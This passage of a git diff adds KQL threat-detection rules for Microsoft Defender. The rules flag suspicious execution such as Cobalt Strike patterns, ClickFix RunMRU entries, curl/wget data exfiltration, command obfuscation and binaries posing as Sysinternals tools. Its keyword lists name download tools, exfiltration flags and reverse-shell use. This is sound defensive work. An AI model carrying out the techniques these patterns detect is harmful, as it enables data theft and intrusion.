Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-12-27 +// Level: high +// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules" \ No newline at end of file diff --git a/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql b/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql new file mode 100644 index 00000000..46ec6a4e --- /dev/null +++ b/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql @@ -0,0 +1,10 @@ +// Title: Payload Decoded and Decrypted via Built-in Utilities +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-17 +// Level: medium +// Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer. +// MITRE Tactic: Execution +// Tags: attack.t1059, attack.t1204, attack.execution, attack.t1140, attack.defense-evasion, attack.s0482, attack.s0402 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/Volumes/" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "-base64" and ProcessCommandLine contains " -d ") and FolderPath endswith "/openssl" \ No newline at end of file diff --git a/KQL/rules/Execution/pcre_net_package_image_load.kql b/KQL/rules/Execution/pcre_net_package_image_load.kql new file mode 100644 index 00000000..7305c0fd --- /dev/null +++ b/KQL/rules/Execution/pcre_net_package_image_load.kql @@ -0,0 +1,10 @@ +// Title: PCRE.NET Package Image Load +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-29 +// Level: high +// Description: Detects processes loading modules related to PCRE.NET package +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceImageLoadEvents +| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\" \ No newline at end of file diff --git a/KQL/rules/Execution/pcre_net_package_temp_files.kql b/KQL/rules/Execution/pcre_net_package_temp_files.kql new file mode 100644 index 00000000..8c7e4bf5 --- /dev/null +++ b/KQL/rules/Execution/pcre_net_package_temp_files.kql @@ -0,0 +1,10 @@ +// Title: PCRE.NET Package Temp Files +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-29 +// Level: high +// Description: Detects processes creating temp files related to PCRE.NET package +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceFileEvents +| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\" \ No newline at end of file diff --git a/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql b/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql new file mode 100644 index 00000000..fc9fcce2 --- /dev/null +++ b/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql @@ -0,0 +1,12 @@ +// Title: PDQ Deploy Remote Adminstartion Tool Execution +// Author: frack113 +// Date: 2022-10-01 +// Level: medium +// Description: Detect use of PDQ Deploy remote admin tool +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1072 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/perl_inline_command_execution.kql b/KQL/rules/Execution/perl_inline_command_execution.kql new file mode 100644 index 00000000..5d7cc9ad --- /dev/null +++ b/KQL/rules/Execution/perl_inline_command_execution.kql @@ -0,0 +1,10 @@ +// Title: Perl Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/php_inline_command_execution.kql b/KQL/rules/Execution/php_inline_command_execution.kql new file mode 100644 index 00000000..4ed236fa --- /dev/null +++ b/KQL/rules/Execution/php_inline_command_execution.kql @@ -0,0 +1,10 @@ +// Title: Php Inline Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-02 +// Level: medium +// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql b/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql new file mode 100644 index 00000000..0c8438aa --- /dev/null +++ b/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential Arbitrary Command Execution Via FTP.EXE +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:" or ProcessCommandLine contains "–s:" or ProcessCommandLine contains "—s:" or ProcessCommandLine contains "―s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql new file mode 100644 index 00000000..d9f7fb35 --- /dev/null +++ b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql @@ -0,0 +1,13 @@ +// Title: Potential Arbitrary File Download Via Cmdl32.EXE +// Author: frack113 +// Date: 2021-11-03 +// Level: medium +// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. +Attackers can abuse this utility in order to download arbitrary files via a configuration file. +Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql new file mode 100644 index 00000000..6d4b4137 --- /dev/null +++ b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql @@ -0,0 +1,13 @@ +// Title: Potential Binary Impersonating Sysinternals Tools +// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2021-12-20 +// Level: medium +// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection. +This rule looks for the execution of binaries that are named similarly to Sysinternals tools. +Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005 + +DeviceProcessEvents +| where ((FolderPath endswith "\\accesschk64a.exe" or FolderPath endswith "\\ADExplorer64a.exe" or FolderPath endswith "\\ADInsight64a.exe" or FolderPath endswith "\\adrestore64a.exe" or FolderPath endswith "\\Autologon64a.exe" or FolderPath endswith "\\Autoruns64a.exe" or FolderPath endswith "\\autorunsc64a.exe" or FolderPath endswith "\\Clockres64a.exe" or FolderPath endswith "\\Contig64a.exe" or FolderPath endswith "\\Coreinfo64a.exe" or FolderPath endswith "\\Dbgview64a.exe" or FolderPath endswith "\\disk2vhd64a.exe" or FolderPath endswith "\\diskext64a.exe" or FolderPath endswith "\\DiskView64a.exe" or FolderPath endswith "\\du64a.exe" or FolderPath endswith "\\FindLinks64a.exe" or FolderPath endswith "\\handle64a.exe" or FolderPath endswith "\\hex2dec64a.exe" or FolderPath endswith "\\junction64a.exe" or FolderPath endswith "\\LoadOrd64a.exe" or FolderPath endswith "\\LoadOrdC64a.exe" or FolderPath endswith "\\logonsessions64a.exe" or FolderPath endswith "\\movefile64a.exe" or FolderPath endswith "\\notmyfault64a.exe" or FolderPath endswith "\\notmyfaultc64a.exe" or FolderPath endswith "\\pendmoves64a.exe" or FolderPath endswith "\\pipelist64a.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\procexp64a.exe" or FolderPath endswith "\\Procmon64a.exe" or FolderPath endswith "\\PsExec64a.exe" or FolderPath endswith "\\psfile64a.exe" or FolderPath endswith "\\PsGetsid64a.exe" or FolderPath endswith "\\PsInfo64a.exe" or FolderPath endswith "\\pskill64a.exe" or FolderPath endswith "\\psloglist64a.exe" or FolderPath endswith "\\pspasswd64a.exe" or FolderPath endswith "\\psping64a.exe" or FolderPath endswith "\\PsService64a.exe" or FolderPath endswith "\\pssuspend64a.exe" or FolderPath endswith "\\RAMMap64a.exe" or FolderPath endswith "\\RegDelNull64a.exe" or FolderPath endswith "\\ru64a.exe" or FolderPath endswith "\\sdelete64a.exe" or FolderPath endswith "\\sigcheck64a.exe" or FolderPath endswith "\\streams64a.exe" or FolderPath endswith "\\strings64a.exe" or FolderPath endswith "\\sync64a.exe" or FolderPath endswith "\\Sysmon64a.exe" or FolderPath endswith "\\tcpvcon64a.exe" or FolderPath endswith "\\tcpview64a.exe" or FolderPath endswith "\\vmmap64a.exe" or FolderPath endswith "\\whois64a.exe" or FolderPath endswith "\\Winobj64a.exe" or FolderPath endswith "\\ZoomIt64a.exe") or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RAMMap64.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe")) and (not(((isnull(ProcessVersionInfoCompanyName) or isnull(ProcessVersionInfoProductName)) or ((ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")) or ProcessVersionInfoProductName startswith "Sysinternals")))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql b/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql new file mode 100644 index 00000000..77221f2c --- /dev/null +++ b/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Binary Proxy Execution Via Cdb.EXE +// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-26 +// Level: medium +// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1106, attack.defense-evasion, attack.t1218, attack.t1127 +// False Positives: +// - Legitimate use of debugging tools + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql new file mode 100644 index 00000000..c5fae8b5 --- /dev/null +++ b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql @@ -0,0 +1,16 @@ +// Title: Potential ClickFix Execution Pattern - Registry +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-03-25 +// Level: high +// Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. +ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. +Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, +such as one-liners that execute remotely hosted malicious files or scripts. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.001 +// False Positives: +// - Legitimate applications using RunMRU with HTTP links + +DeviceRegistryEvents +| where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql b/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql new file mode 100644 index 00000000..cc093543 --- /dev/null +++ b/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql @@ -0,0 +1,10 @@ +// Title: Potential CobaltStrike Process Patterns +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-07-27 +// Level: high +// Description: Detects potential process patterns related to Cobalt Strike beacon activity +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql b/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql new file mode 100644 index 00000000..99339f41 --- /dev/null +++ b/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential CommandLine Path Traversal Via Cmd.EXE +// Author: xknow @xknow_infosec, Tim Shelton +// Date: 2020-06-11 +// Level: high +// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 +// False Positives: +// - Java tools are known to produce false-positive when loading libraries + +DeviceProcessEvents +| where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_cookies_session_hijacking.kql b/KQL/rules/Execution/potential_cookies_session_hijacking.kql new file mode 100644 index 00000000..5744e7cb --- /dev/null +++ b/KQL/rules/Execution/potential_cookies_session_hijacking.kql @@ -0,0 +1,10 @@ +// Title: Potential Cookies Session Hijacking +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: medium +// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql b/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql new file mode 100644 index 00000000..56d074aa --- /dev/null +++ b/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql @@ -0,0 +1,12 @@ +// Title: Potential Data Exfiltration Activity Via CommandLine Tools +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects the use of various CLI utilities exfiltrating data via web requests +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (((ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine matches regex "net\\s+view" or ProcessCommandLine matches regex "sc\\s+query") or (ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and ProcessCommandLine contains " C:\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql new file mode 100644 index 00000000..e73ec42e --- /dev/null +++ b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql @@ -0,0 +1,15 @@ +// Title: Potential DLL Injection Via AccCheckConsole +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-06 +// Level: medium +// Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. +One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. +The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility. + +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - Legitimate use of the UI Accessibility Checker + +DeviceProcessEvents +| where (ProcessCommandLine contains " -hwnd" or ProcessCommandLine contains " -process " or ProcessCommandLine contains " -window ") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_dosfuscation_activity.kql b/KQL/rules/Execution/potential_dosfuscation_activity.kql new file mode 100644 index 00000000..e4dd8aca --- /dev/null +++ b/KQL/rules/Execution/potential_dosfuscation_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential Dosfuscation Activity +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-02-15 +// Level: medium +// Description: Detects possible payload obfuscation via the commandline +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t " \ No newline at end of file diff --git a/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql b/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql new file mode 100644 index 00000000..84081c5a --- /dev/null +++ b/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql @@ -0,0 +1,12 @@ +// Title: Potential Dropper Script Execution Via WScript/CScript +// Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects wscript/cscript executions of scripts located in user directories +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007 +// False Positives: +// - Some installers might generate a similar behavior. An initial baseline is required + +DeviceProcessEvents +| where (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe") and (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql new file mode 100644 index 00000000..86fe2b90 --- /dev/null +++ b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql @@ -0,0 +1,13 @@ +// Title: Potential File Extension Spoofing Using Right-to-Left Override +// Author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2024-11-17 +// Level: high +// Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1036.002 +// False Positives: +// - Filenames that contains scriptures such as arabic or hebrew might make use of this character + +DeviceFileEvents +| where (FolderPath contains "3pm." or FolderPath contains "4pm." or FolderPath contains "cod." or FolderPath contains "fdp." or FolderPath contains "ftr." or FolderPath contains "gepj." or FolderPath contains "gnp." or FolderPath contains "gpj." or FolderPath contains "ism." or FolderPath contains "lmth." or FolderPath contains "nls." or FolderPath contains "piz." or FolderPath contains "slx." or FolderPath contains "tdo." or FolderPath contains "vsc." or FolderPath contains "vwm." or FolderPath contains "xcod." or FolderPath contains 